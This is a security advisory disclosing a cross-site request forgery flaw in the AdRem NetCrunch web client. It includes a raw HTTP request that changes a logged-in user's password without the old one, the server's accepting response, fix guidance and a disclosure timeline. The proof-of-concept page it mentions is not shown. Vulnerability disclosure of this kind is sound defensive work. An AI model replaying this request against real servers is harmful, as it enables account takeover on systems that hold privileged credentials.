################################################################################ # # COMPASS SECURITY ADVISORY # https://compass-security.com/en/research/advisories # ################################################################################ # # Product: NetCrunch # Vendor: AdRem # CSNC ID: CSNC-2019-016 # CVE ID: CVE-2019-14481 # Subject: Cross-Site Request Forgery (CSRF) # Risk: High # Effect: Remotely exploitable # Authors: Thierry Viaccoz # Sylvain Heiniger # Fabio Poloni # Date: 26.07.2019 # ################################################################################ Introduction: ------------- NetCrunch [1] is a so-called "agentless" monitoring solution developed by AdRem. It allows system administrators to monitor, visualize and get alerts from many kinds of systems in their network. The solution consists of a server and a fat client (also called console), as well as a web client. Due to its architecture, the monitoring server is a critical system as it holds credentials, most of the time privileged, for all monitored system. Compass Security identified a Cross-Site Request Forgery (CSRF) vulnerability in the AdRem NetCrunch web client. Successful exploitation requires a logged-in user to open a malicious page and leads to account takeover. Affected: --------- Initially vulnerable: * AdRem NetCrunch 10.6.0.4587 Not vulnerable: * AdRem NetCrunch 11.0.0.5282 (old password required to change it) Still vulnerable: * AdRem NetCrunch 11.0.0.5282 (still no general anti-CSRF mechanism) No other version was tested, but it is believed that older versions are also vulnerable. Technical Description: ---------------------- Non-idempotent requests (i.e. requests that change data or trigger actions on the server) are not protected against Cross-Site Request Forgery attacks. An attacker can cause the victim's browser to execute undesired actions in the web application through crafted requests. Such requests can be executed by luring the logged-in user onto a malicious website or by making them click a prepared link. Since it is not required to enter the old password when changing it, an attacker can use this vulnerability to set the password of the logged-in user to an arbitrary value. Use the following proof-of-concept generated by Burp Suite: Request triggered by the proof-of-concept above, changing the logged-in user's password to "compass": POST /Options.json?requestId=4 HTTP/1.1 Host: some-server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Origin: null Cookie: WASessionId=2125729872 Connection: close newPassword=compass&newPasswordConfirm=compass Response showing that the request was accepted: HTTP/1.1 200 OK Connection: close Content-Type: text/json; charset=UTF-8 Content-Length: 17 Cache-control: no-cache Date: Wed, 31 Jul 2019 19:41:17 GMT Pragma: no-cache Server: AdRem WebApp Server { success: true } Workaround / Fix: ----------------- Make requests unique by including an element which cannot be predicted by an attacker. This CSRF token should have the following properties: - Generated by the server - Unique per session - Secure random - Transported as POST parameter or HTTP header When receiving a request, the server needs to validate the token. If the token is incorrect, missing, or does not match the user session, the request should be dropped. In addition, the user should have to provide the old password in order to change it. As a NetCrunch customer, update your installation to the latest version to receive the fix. Timeline: --------- 2019-05-23: Discovery by Thierry Viaccoz, Sylvain Heiniger and Fabio Poloni 2019-08-01: Assigned CVE-2019-14481 2019-08-29: Initial vendor notification 2020-12-08: Coordinated public disclosure date References: ----------- [1] https://www.adremsoft.com/